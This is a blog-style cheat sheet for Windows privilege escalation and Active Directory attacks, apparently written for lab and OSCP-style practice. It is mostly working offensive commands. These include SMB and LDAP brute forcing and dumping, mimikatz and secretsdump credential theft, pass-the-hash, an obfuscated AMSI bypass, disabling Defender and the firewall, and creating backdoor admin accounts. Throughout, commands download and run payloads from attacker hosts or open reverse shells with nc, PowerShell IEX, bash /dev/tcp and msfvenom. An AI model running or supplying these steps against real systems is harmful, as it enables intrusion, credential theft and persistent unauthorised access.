Skip to main content

Windows Priv Escallation

By
   7. Newb Guide - Windows Pentest
   8. Kerberos Attacks Explained 
   9. How to Attack Kerberos 101
  
Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info

 check for Non-windows processes in windows using netstat
Step 1: Check net user and admin and user rights

Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1.

Step 3: Try to get Meterpreter.

Step 4: Load mimikatz,try bypass UAC, check SAM SYSTEM etc.

Step 5: check for weird programs and registry.

Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce  Atacking AD with LDAP & kerberos  
 
Step 7: Got Creds - try psexec.py or crackmapexec - cheatsheet
SMB Enumeration

smbmap -H 10.10.10.10          //Check Privileges 

smbmap -H 10.10.10.10 -R --depth 5

smbclient -L //10.10.10.10/            //List Shares

smbclient //10.10.10.10/Users      //Interactive shell to a share 

smbclient  \\\\10.10.10.10\\share$     //Open a Null Session

smbclient //friendzone.htb/general -U ""    //see files inside

smbclient -N -L //10.10.10.10/      //List Shares as Null User

psexec.py administrator@10.10.10.10         //Enter pass later

smbmap -u Administrator -p 'Password@1' -H 10.10.10.10

smbclient -U 'administrator%Password@1' \\\\\10.10.10.10\\c$

once logged in;

put filename               //can upload any file

#Using Kerberos ticket with Smbclient 
smbclient -k -L //10.10.10.10/ 

#Basic SMB & OS info
crackmapexec smb 10.10.10.10

#List Shares 
crackmapexec smb 10.10.10.10 --shares

#passing blank creds via smb
crackmapexec smb 10.10.10.10 --shares -u '' -p ''

#If the password needs to be changed
smbpasswd -U username -r 10.10.10.10

#Brute forcing SMB Creds
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt

#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15  smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success 

#access SMB using a hash
smbclient //10.10.10.10/NAME -U username --pw-nt-hash 07772ae654432cd618915793515asds 

#Starting SMB Server
sudo smbserver.py share $(pwd)
Find Users in Windows Environment

nmap --script smb-enum-users.nse -p445 IP_Address
Powershell Ping Sweep

1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_} | Select-String ttl 
DNS Enum

dig @10.10.10.10 -x 10.10.10.10
Ldap Enumeration:

ldapsearch -x -h 10.10.10.10 -s base namingcontexts 

ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt


Dumping passwords using LDAP:

ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd
Domain Enumeration with RPcclient

#Enum using Null Session
rpcclient -U "" 10.10.10.10

#Login as a user
rpcclient -U USERNAME //10.10.10.10

#Find Users in the domain 
rpcclient -Uuser_Name%PASSWORD -c enumdomusers 10.10.10.10

#Find Domian Info
rpcclient -Uuser_Name%PASSWORD -c querydominfo  10.10.10.10

#Find Groups and their Alias
rpcclient -Uuser_Name%PASSWORD -c "enumalsgroups builtin" 10.10.10.10

#Find more info using Alias and note SIDs
rpcclient -Uuser_Name%PASSWORD -c "queryaliasmem builtin 0x244" 10.10.10.10

#Find more info using SIDs
rpcclient $> lookupsids S-1-5-21-586154515854-343543654-8743952433-1105 

#Reset other Users Password
rpcclient -U user1 //10.10.10.10
setuserinfo2 USER2 23 'PASSWORD'

Enum using RPCClient

rpcclient -U DOMAIN\\Username 10.10.10.10   #Enter pass 

enumdomusers     #Enumerate Domain Users 

enumprivs        #Enum Privileges

enumprinters    #Enum Printers

Access other user's share 

net use \\DC.STEINS.LOCAL\c$ /u:STEINS.LOCAL\admin 'P@$$W0rd!' 

or 


$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)


invoke-command -computername dc -scriptblock { dir C:\users\username\desktop } -credential $cred
Add a user to another group

Powerview:

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

Windows:
net group "Remote Admin Permissions" USERNAME /add /domain
Disable AntiVirus/ Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true
Diasble AMSI 

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Download All the files Recursively from a Share:

smbclient '\\IP_ADDRESS\Share' -N -c 'prompt OFF;recurse ON;mget *'

or  

  smbclient '\\server\share'
  mask ""
  recurse ON
  prompt OFF
  cd 'path\to\remote\dir'               //Can Skip
  lcd '~/path/to/download/to/'          //Can Skip
  mget *
Mounting SMB Share:

smbclient -L //IP_Address     /suppose if you have access to one share. we can mount it to check the data

mkdir /mnt/smb

moung -t cifs //IP_ADDRESS/Share_Name /mnt/smb

cd /mnt/smb                   /We can gain access to it. 
Writable Directories 
save exploits in below directories. 

C:\Windows\System32\spool\drivers\color\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\Tasks
C:\windows\tracing

Run as NT Authority/System when you are running as Administrator

Psexec.exe -s -d -i cmd.exe
Running a Powershell Script on Target Machine 

http://website.com/cmd.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33/pu.ps1')| powershell -noprofile - 
RCE using wmiexec

proxychains wmiexec.py -debug -nooutput domain/username:'password'@TARGET_ip "powershell.exe Invoke-WebRequest -Uri 'http://KALI_ip/nc.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\nc.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe KALI_IP 9001"
Getting Hashes from SAM/System

reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system

impacket-secretsdump -sam SAM -system SYSTEM local


Note: if the hash starts with 31d6, the password is either blank or the account is disabled. 

decrypt the hash from http://hashes.org/search.php

Login with the HASH:

smbmap -u USER_NAME -p WHAT_EVER:THE_HASH_IS -H IP_ADDRESS
If MountD service is running 

showmount -e 10.10.10.10      #lists the available mount drives 

mkdir /tmp/SHARE_NAME
mount -t nfs 10.10.10.10:/SHARE_NAME /tmp/SHARE_NAME -nolock
Logging into Mysql and Getting a shell

mssqlclient.py -windows-auth -p 1433 10.10.10.125/Reporting:PcwTWTHRwryjc\$c6@10.10.10.125

or 

mssqlclient.py mssql-svc@10.10.10.125 -windows-auth

corporate568                //Password
Ping Sweep

for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i 
Run CMD Commands in Powershell

cmd /c 'COMMAND' 
Find OS Version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
Check for Privileges 

whoami /priv 

whoami /all
Check for Running Serices - CMD 

sc queryex type= service state= all      


List Service Names only 
sc queryex type=service state=all | find /i "SERVICE_NAME:"

Search for a Specific Service 
sc queryex type=service state=all | find /i "SERVICE_NAME: myService"

Get Status of Service
sc query myService


Get List of Running Srevices
sc queryex type=service
sc queryex type=service state=active
net start

# Services running on localhost
netstat -ano
Check for Accessible Shares

net share 
Check for Running Serices - PS

Get-Service 

Get List of Running Srevices
Get-Service | Where-Object {$_.Status -eq "Running"}

Get Status of a Service
Get-Service myService
See the Services Running as NT Authority

wmic service where started=true get name, startname
AlwaysInstall Elevated: 

Allows non-privileged users to run executables as SYSTEM

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 

If Available:
msfvenom -p windows/adduser USER=bhanu PASS=bhanu123 -f msi -o create_user.msi

On target:
msiexec /quiet /qn /i C:\create_user.msi


Metasploit:

use exploit/windows/local/always_install_elevated
Scheduled Tasks:

schtasks /query /fo LIST /v        /Too much info
Running Windows Services

net start 
Services Running on Localhost
netstat -ano 

netstat -an | find "LISTEN" 

Using Plink:
on Kali: sudo service ssh start 

on Victim: plink.exe -l username -pw pasword KALI_IP -R Attacker_Port_to_receive:127.0.0.1:Victim_port_to_Forward


Example: 
plink -l root -pw password KALI_IP -R 3390:127.0.0.1:3389



Portforward using Meterpreter:

portfwd add -l <attacker port> -p <victim port> -r <victim ip>

portfwd add -l 3306 -p 3306 -r 192.168.1.101


Remote Port Forwarding using Chisel-download

on kali: chisel server --port 9002 -reverse
on target: chisel.exe client KALI_IP:9002 R:127.0.0.1:8888:KALI_IP:9003
 

Port Forwarding using NetSH: Need admin to run 


netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=8888 connectaddress=10.10.14.7 connectport=8000

#listen Address = VICTIM IP
#Listen Port = Victim Port
#connectaddress = Attacker IP
#connectport = Attacker Port
Compiling 32-bit Exploits:

i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
Creating cmd.exe 

nano cmd.c
#include <stdlib.h>
int main() {
system("C:\\Windows\\System32\\cmd.exe");
}

sudo x86_64-w64-mingw32-gcc cmd.c -o cmd.exe 
World Readable 

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"

icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"  
Autologon Registry

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
View Hidden Directories

dir -Force

Poweshell Commands:
Get-ChildItem . -Force
gci -Force
ls -Force

Find Passwords in Registry

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly"
vncpwd.exe PASSWORD_FROM_ABOVE

# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

#Winscp
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP" 2\Sessions

To decrypt winscp keys,copy the username,hostname and encrypted password and use github-winscppassworddecrypt


# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s 
Using Other Users Registry in Regedit

net user /add bhanu Bhanu@1234  /Create an account named Bhanu 

net localgroup administrators bhanu /add   Give Admin Privs  reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0    Start RDP Service 

netsh firewall set service remoteadmin enable 

netsh firewall set service remotedesktop enable

proxychains rdesktop 10.10.10.10 -u Bhanu -p Bhanu@1234 


#loading Other Users HKU
load HKU\USERNAME c:\users\USERNAME\ntuser.dat

now open regedit and find the username in HKEY_USERS
IIS Webserver - Hidden Files and Config Files 

dir /a C:\inetpub\
dir /s web.config
C:\Windows\System32\inetsrv\config\applicationHost.config 
Anything in Credential Manger 

cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ 
Check for Vulnerable Drivers

DRIVERQUERY 
Find Installed Paths

wmic qfe get Caption,Description,HotFixID,InstalledOn
Using Runas to run as Different User

PsExec.exe -u hostname\username -p password "nc.exe TARGET_IP 443 -e cmd.exe"


C:\Windows\System32\runas.exe /env /noprofile /user:USERNAME PASSWORD "c:\users\Public\nc.exe -nc TARGET_IP 443 -e cmd.exe"


Using Powershell:

$secpasswd = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("USERNAME", $secpasswd)
$computer = "HOSTNAME"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

TO run the Script:

powershell -ExecutionPolicy Bypass -File c:\users\public\r.ps1

or 

use RunasCS Github 
Can We Access SAM & System Files

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system 
Checking File Permissions using assesschk.exe

accesschk.exe -qwsu "Everyone" *
accesschk.exe -qwsu "Authenticated Users" *
accesschk.exe -qwsu "Users" * 

accesschk.exe -uwcqv "username" *   / Check for RW permissions

Exploit: 
sc config daclsvc binpath= "net localgroup administrators bhanu /add "
sc start daclsvc
What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it?

tasklist /svc
tasklist /v
net start
sc query 
Always Install Elevated Privileges 

This the DWORD of these registries contain "AlwaysInstallElevated" which is set to "1", we can install any msi as  NT Authrity\System

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

OR

reg qurey "HKLM\Software\Policies\Microsoft\Windows\Installer"

reg qurey "HKCU\Software\Policies\Microsoft\Windows\Installer" 


Exploit:

msfvenom -p windows/exec CMD='net localgroup administrators bhanu /add' -f msi-nouac -o exploit.msi

on Target: msiexec /quiet /qn /i C:\temp\exploit.msi
Scheduled Tasks

schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks

Powershell:
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Unquoted Service Paths - 
can be exploited - use PowerUP

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

OR

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

OR 
sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul

Powershell:
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Juicy Potato Exploit - SeImpersonatePrivilege Enabled

JuicyPotato.exe -l 1340 -p C:\users\User\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.37 LPORT=443 -f exe -o reverse.exe

./jp.exe -l 1345 -p c:\windows\temp\reverse.exe  -t * 

Operating System information is found in
C:\Windows\System32\license.rtf  --> windows 7
C:\Windows\System32\eula.txt     --> windows xp 
Decrypt GPP Policy from Groups.xml 

Groups.xml:

get-content "C:\programdata\Microsoft\group policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"

<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>


gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ 
Check for Installed Patches 

wmic qfe get Caption,Description,HotFixID,InstalledOn 
Using Sherlock To Check Vulns 

certutil -f -split -urlcache http://10.10.10.10/sherlock.ps1

poweshell -nop -ep bypass

Import-Module .\sherlock.ps1

Find-AllVulns
Check these Config Files - Might contain Password
type c:\windows\Panther\Untattended.xml  \\Find Base64 password
type "c:\ProgamData\McAfee\Common Framework\SiteList.xml" \\Find Base64 password

c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml 
Priv Esc using a Service running as root:
------------------------------------------

services.msc
select a service, which u think might be vulnerable and go to the file's location in cmd

icacls scsiaccess.exe  /if Everyone is present, we can exploit it by replacing the original file by our file

in Kali: Lets create an exploit code for it :) 
----------
nano useradd.c 

#include<stdlib.h>
int main()
{
int i;
i=system("net localgroup administrators username /add");
return 0;
}

ctrl +x --> y

i586-mingw32msv-gcc useradd.c -o useradd.exe

copy this useradd.exe to the target machine and name it as scsiaccess.exe

restart the machine/service :)

services.msc
scsiaccess.exe --> right click --> restart
 
Powershell Sudo For Windows

$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}' 

powershell -ExecutionPolicy Bypass -File xyz.ps1
Disable Firewall/Defender and Enable RDP for all Users

sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Downloading Files with bitsadmin

bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
PsExec Shell for Remote Systems

.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe
Search for keyword "pass,cred,vnc and config"

dir /s *pass* == *cred* == *vnc* == *.config*
search files with keyword "Password" in .xml,ini,.txt files 

findstr /si password *.xml *.ini *.txt
Grep Registry for "Password" Keyword

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Finding Services with incorrect permissions:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"'do @echo %a >> c:\windows\temp\permissions.txt

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"


If wmic is not availale - try sc
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Windows XP Priv Esc - Incorrect Permission in Services

sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.48 9002 -e C:\WINDOWS\System32\cmd.exe"

OR - run all the below commands together to create an Administrator account

sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost

sc config upnphost binpath= "net user bhanu bhanu123 /add"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

sc config upnphost binpath= "net localgroup administrators hacker /add "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

sc config upnphost binpath= "reg add 'hklm\system\currentcontrolset\control\terminal server' /f /v fDenyTSConnections /t REG_DWORD /d 0 "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

sc config upnphost binpath= "netsh firewall set service remoteadmin enable  "
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

sc config upnphost binpath= "netsh firewall set service remotedesktop enable"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost


in Kali:
rdesktop IP_Address
IIS HTTP 6.0 Exploit 
No Proper Input Validation, So change your exploit to 

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=443 -f asp -o payload.html

move payload.html payload.asp;.html
Priv Esc From NT Authrity Service to NT Authority System


Windows Server 2003 -- NT Authority Service to System 

Download and copy the exploit to target machine 

https://www.exploit-db.com/exploits/6705

Github 

Exploiting IIS 6 with ASP .NET
copy churrasco.exe c:\windows\temp\

churrasco.exe -d "net users /add bhanu bhanu123"

churrasco.exe -d "net localgroup administrators bhanu /add"

churrasco.exe -d “reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0”

churrasco.exe -d "netsh firewall set service remoteadmin enable"

churrasco.exe -d “netsh firewall set service remotedesktop enable”

Might be Helpful - Rotten Potato

Session Hijacking - Privilege Impersonation

- when another user has a session on the same machine - need to run as admin #View the logged in sessions - users ; make sure the State is Disc (not-active) query user #create a service that runs as the other user ; /ID= the ID value from query user command; /dest= SESSION NAME from query user # You should see "[SC] CreateSession SUCCESS" sc create ServiceName binpath= "cmd.exe /k tscon 3 /dest:Atacker_SessionName" #Start the service; ServiceName = the one that we created earlier net start ServiceName #you should be running as the user now. 
Exploiting IIS httpd 7.5

You need to add the following code at the end of web.config file and upload it into the server and get a reverse shell using it. reverse shell should be in winrevshell.ps1 file; a file sharing server should be turned on as well. 

<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%> 

Sample Web.config file with Exploit

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>

<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://IP_ADDRESS/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%> 
Mysql Running as Root

Download the UDF file from Here

Tutorial is here

use mysql;
create table potato(line blob);
insert into potato values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from potato into dumpfile '/usr/lib/lib_mysqludf_sys.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
select sys_exec('bash -i >& /dev/tcp/IP_ADDRESS/443 0>&1');


OR try the automated script
Github Exploit  Video Tutorial  
Meterpreter ASP Reverse Shell or Windows

msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.11.0.48 LPORT=9001 -f asp > shell.asp
Dumping Credentials using mimikatz

mimikatz.exe 

privilege::debug          /You should see 200 OK

sekurlsa::logonpasswords     /dump creds and other info

sekurlsa::tickets            /view available tickets

sekurlsa::tickets /export    /Download all the tickets
Exploiting  SeBackupPrivilege Enabled

#robocopy can be used to copy some files 
robocopy C:/Users/Administrator/Desktop/ C:\Temp\ /B

nano darkshadow.txt
set metadata C:\temp\data\metadata.cab
set context persistent nowriters
add volume c: alias tester
create
expose %tester% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\data\ntds.dit
delete shadows volume %tester%
reset


or 


set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% F:
end backup



diskshadow /s darkshadow.txt

Output:
Number of shadow copies listed: 1
-> expose %tester% z:
-> %tester% = {58f8797b-eca2-4d6b-b6f6-351e503b24cb}
The shadow copy was successfully exposed as z:\.

robocopy F:/windows/ntds/ C:\Temp\ /B

OR

Need to download 2 dll files - SeBackupPrivilegeCmdLets.dll  &  SeBackupPrivilegeUtils.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Set-SeBackupPrivilege

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\data\ntds.dit

reg save hklm\system C:\temp\data\system.bak

download both the files to the attacker macahine and get the hashes using secretsdump
secretsdump.py -ntds ntds.dit -system system.bak LOCAL

#login as Admin using the hash 
evil-winrm -H 9658dsa3t1d9250115e2205d9f48400d -u administrator -i 10.10.10.10

#For Clear Text Password
lsassy -d steins.local -u Administrator -H 9658dsa3t1d9250115e2205d9f48400d 10.10.10.10 -m 0 --procdump procdump.exe --dumpert dumpert.exe

Current User:

whoami /all
List out all Users:

net user
Add a user:

net user bhanu bhanu123 /add
Adding a user to Administrators Group:

net localgroup administrators bhanu /add
Remove a user:

net user hacker /del

Check for Active Users using Powershell:

powershell -Command (get-wmiobject win32_useraccount

View Hidden Directories:

dir -Force

dir /R

Get a Proper Windows Shell:

apt-get install rlwrap 
Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")

rlwrap nc -nvlp 9001
Hot Potato - Importing a Powershell Exploit and execute it 

powershell -ep bypass -nop 
Import-Module .\Tater.ps1
Invoke-Tater -Trigger 1 -Command "net users \add bhanu"Invoke-Tater -Trigger 1 -Command "net localgroup administrators bhanu /add"

Download and Execute a Reverse Shell

Powershell IEX(new-object Net.WebClient).Downloadstring(\"http://10.10.14.35:8001/revs.ps1\")

python -m SimpleHTTPServer 8001

nc -nvlp 9001

#Reverse Shell Used is Nishang Invoke-Powershell-TCP.ps1


Change ACL  for a File 

cacls “C:\Users\Administrator\Desktop\root.txt” /E /P Alfred:F


cacls Windows utility to view/edit file permissions 
/E to edit ACL 
/P to set permissions 
Alfred:F to give Alfred full control of the file


Add this to Cron Jobs To get a Shell

 echo "IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/rev9002.ps1')" > cronjob_FileName.ps1



Login with NTML Pass hases into a Windows machine 
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

Create RDP Access on Target Machine - After you got the shell  
net user /add bhanu bhanu123  /Create an account named Bhanu 

net localgroup administrators bhanu /add   Give Admin Privs  


reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0    Start RDP Service 

netsh firewall set service remoteadmin enable 

netsh firewall set service remotedesktop enable


On kali:
rdesktop 10.10.10.63

{Metasploit} Login with NTML Pass hases into a Windows machine 
use exploit/windows/smb/psexec
set rhost 10.10.10.63
set smbuser administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
set lport 8888
exploit



run getgui -e    /Enable RDP on Target
shell
net user administrator password


on Kali:

rdesktop 10.10.10.63 
administrator password 


Check for Hidden Files:

 get-content .\root.txt -stream *

 get-content .\root.txt -stream root.txt

Run as admin with prev saved cred
runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt"
File Transfer using Certutil.exe
certutil.exe -urlcache -split -f http://10.10.14.6/sherlock.ps1 sherlock.ps1

Priv Esc (getting Root) using Metasploit
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.6 LPORT=9003 –platform win -a x64 -f exe > shell.exe


certutil -urlcache -f http://10.10.14.6:8001/shell.exe shell.exe


msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp 
set lport 9003
set lhost 10.10.14.6

run
run post/multi/recon/local_exploit_suggester
background
*********** use exploit/local/EXPLPOIT-SUGGESTED************
set lport 9004
set lhost 10.10.14.6
run 
getuid

Transfer Files Using FTP Service

echo open 10.10.14.19>ftp_commands.txt&echo anonymous>>ftp_commands.txt&echo password>>ftp_commands.txt&echo binary>>ftp_commands.txt&echo get ms15.exe>>ftp_commands.txt&echo bye>>ftp_commands.txt&ftp -s:ftp_commands.txt 

python -m pyftpdlib -p 21

Transfer Files & Getting Root Shell

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8001/shell.exe', 'shell.exe')


Create Exploit:


msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe

python -m SimplerHTTPServer 8001

dir | findstr shell

runas /user:Administrator /noprofile /savecred "cmd.exe /c shell.exe

Transfer Files & Getting Root Shell
Building the Payload:

/usr/share/nishang/Shells/Invoke-PowershellTcp.ps1 

already available on kali, if not Download from here. 


echo "Invoke-PowerShellTcp -Reverse -IPAddress XX.XX.XX.XX -Port 9001 >> Invoke-PowershellTcp.ps1

python -m SimpleHTTPServer 8001  

                        or
webup 8001

Transferring the Payload:


